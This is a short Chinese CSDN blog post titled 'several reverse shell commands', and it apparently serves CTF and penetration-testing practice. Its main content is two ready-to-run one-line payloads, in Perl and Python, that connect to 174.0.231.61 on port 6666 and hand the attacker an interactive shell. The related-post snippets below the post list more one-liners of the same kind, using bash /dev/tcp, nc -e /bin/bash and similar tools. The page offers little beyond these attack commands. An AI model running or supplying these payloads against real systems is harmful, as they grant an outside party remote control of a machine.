几种反弹shell命令

最新推荐文章于 2023-04-24 16:18:36 发布

天问_Herbert555

最新推荐文章于 2023-04-24 16:18:36 发布

阅读量698

点赞数

https://blog.csdn.net/qq_44657899

本文链接：https://blog.csdn.net/qq_44657899/article/details/107451164

版权

文章目录

perl
python

perl

payload：

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.231.61:6666");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

使用：
在这里插入图片描述

python

payload：

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('174.0.231.61',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

注：这个脚本python2，也可以用，只需把python3改为python即可。

使用：
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

天问_Herbert555

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

内网渗透-常用反弹shell方法总结

lza20001103的博客

08-28

4717

常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt

内网渗透-反弹shell的N种姿势

lza20001103的博客

09-04

721

反弹shell的N种姿势文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc（netcat）反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言在渗透测试的过程中，在拿到webshell以后，

参与评论您还未登录，请先登录后发表或查看评论

[V&N2020 公开赛]CHECKIN（文件被进程打开后被删除，内存中有文件内容）

qq_44657899的博客

09-11

689

这道题我在vps上实验了一下，对于linux的理解又加深了。知识点：文件描述符，在linux里，当一个进程打开某个文件直到关闭前，该进程会获得文件描述符，而文件描述符里有文件的内容，即便已经将文件删除，只是删除了其相应的目录索引节点，若进程依然存在没被关闭的话，就依然可以通过文件提供给它的文件描述符进行操作。/proc/[pid]/fd这个目录里包含了进程打开文件的情况，pid就是进程记录的打开文件的序号。实验：读取内存中的flag内容使用命令：lsof lsof命令可以查看进程打开那些文件

[V&N2020 公开赛]CHECKIN

SopRomeo的博客

04-21

954

将python整理一下 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") #flag = flag_file.read() #flag_file.close() #@app.route('/flag') #def flag(): # retur...

V&N2020 公开赛 CHECKIN

cjdgg的博客

11-05

1314

V&N2020 公开赛 CHECKIN 这题直接给出了源代码，不是很多，也很简单直接访问/flag是拿不到flag的而访问/shell虽然可以执行一条传入的命令，但是它会把存放flag的txt文件给删掉而且由于/shell路由返回的是1，所以我们是看不到命令执行后的回显的，那就只能弹shell了因为这里是python环境下，所以去找了python环境下反弹shell相关文章 emem我就拿了这个改成了自己的vps地址，这里得注意一点，估计是靶机环境的缘故，得是python3才能执行 p

linux的几种shell反弹

m0_64343941的博客

11-26

103

一、 basn反弹开启监听端口，被攻击者ip为攻击者的。kali为攻击者。 nc -lvvp 10000 bash -i >& /dev/tcp/192.168.96.133/10000 0>&1 nc反弹 nc -e /bin/bash 192.168.96.133 10000 虽然没有输入框，但其实已经反弹成功， python反弹，需要有python环境。 nc -lvvp 10000 ...

反弹shell

ADDPPC的博客

11-26

590

反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell？通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、.

mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解

weixin_39929465的博客

01-27

1410

*本文原创作者：LlawLiet，本文属FreeBuf原创奖励计划，未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法，为了更熟练的去运用这些技术，于是自己花精力查了很多资料去理解这些命令的含义，将研究的成果记录在这里，所谓的反弹shell，指的是我们在自己的机器上开启监听，然后在被攻击者的机器上发送连接请求去连接我们的机器，将被攻击者的shell反弹到我们的机器上...

反弹shell的几种获取方式.docx

热门推荐

hackzkaq的博客

02-21

1万+

零基础学黑客，搜索公众号：白帽子左一简介：shell类似于DOS下的COMMAND.COM和后来的cmd.exe，它接收用户命令，然后调用相应的应用程序，也可以通俗的说是命令执行环境。分为交互式shell，与非交互式shell。交互shell就是shell等待你的输入，并且立即执行你提交的命令，这种模式被称作交互式是因为shell与用户进行交互。非交互shell不会与用户进行交互，而是用户读取存放在文件中的命令或者输入的命令，并且执行它们。当它读到文件的结尾，shell也就终止了。 1.nc反弹sh

[V&N2020 公开赛]CHECKIN -wp

freerats的博客

08-05

260

from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # return flag ## want flag? naive! # You will never find the thing

反弹shell常用命令

mirocky的博客

01-15

8622

反弹shell常用命令 1 attacker端的监听——netcat (1) windows环境下下载netcat 下载地址将如图的nc.exe所在文件夹添加到环境变量 (2) linux环境下下载netcat yum install netcat (3) 安装结束使用如下命令判断是否安装成功 nc -h 使用如下命令开始监听 nc -lvvp port 2 靶机命令 (1) bash bash一句话为： bash -i >& /dev/tcp/ip/port 0>&a

Linux常用的反弹shell命令

m0_63200360的博客

04-24

2925

什么是反弹shell？反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell？通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。

linux系统常用命令利用——反弹shell

初学者L_言的博客

05-19

398

一、环境 Aliyun Linux （192.168.47.136） Metasploitable2 Linux （192.169.47.133）目的: 将Metasploitable 的 shell 反弹给 Aliyun 二、具体实操 2.1 通过 linux 命令 NC 1、首先 Aliyun 侦听某个端口如 4444 端口 nc -nvlp 4444 2、Meta..上执行： nc -e /bin/bash 192.168.47.136 4444 2.2 通过bash命令 1、首先 Ali

Linux下Shell 反弹总结

AaronLuo

10-14

672

当拿到webshell的时候，因为webshell的环境是虚拟终端，不是交互型终端，很多命令是无法执行的，所以需要拿到交互式shell，就得反弹shell 工具准备 VPS(公网ip) python环境 nc(netcat) Ubuntu(宿主机) 反弹shell 步骤首先在vps上使用netcat开启监听 nc -lvnp 8080 参数 -l：使用监听模式，监控传入的资料; -v：显...

反弹shell命令

Shanfenglan's blog

10-29

2680

文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l

re学习笔记（48）BUUCTF-re-[V&N2020 公开赛]CSRe

逆向随笔

03-01

1713

新手一枚，如有错误（不足）请指正，谢谢！！个人博客：点击进入 C#程序，且用Eazfuscator.NET混淆了代码。使用de4dot工具进行处理之后使用dnSpy32位打开找到main()函数 Class3.smethod_0查看发现是对字符串进行sha1加密。加密后与字符串进行比对。将加密后的在【cmd5】网站进行查询得到flag为flag{1415turn} ...

NC 反弹shell

08-30

NC反弹shell是一种利用NetCat工具实现的一种技术，用于在目标机器和控制机器之间建立一个反向连接，并获得对目标机器的控制权。在反弹shell中，目标机器先执行NC命令，将shell连接到控制机器上的NC监听端口，从而使控制机器能够控制目标机器。有几种方法可以实现NC反弹shell。其中一种是使用bash反弹，命令如下： ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意，这种方法需要在控制机器上执行。另一种方法是使用NC命令进行反向连接，命令如下： ``` nc -e /bin/bash 192.168.0.4 7777 ``` 这种方法适用于在CentOS或Ubuntu上使用。还有一种方法是使用php反弹shell，需要目标机器安装NC。命令如下： ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 同样，这种方法需要在控制机器上执行。总而言之，NC反弹shell是一种通过建立反向连接实现对目标机器的控制的技术。可以使用不同的方法来实现反弹shell，如bash反弹和php反弹。这些方法需要根据具体情况和系统进行选择和执行。123 #### 引用[.reference_title] - *1* [详解NC反弹shell的几种方法](https://download.csdn.net/download/weixin_38664159/14048091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NC反弹shell的几种方法](https://blog.csdn.net/qq_59350385/article/details/124733038)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]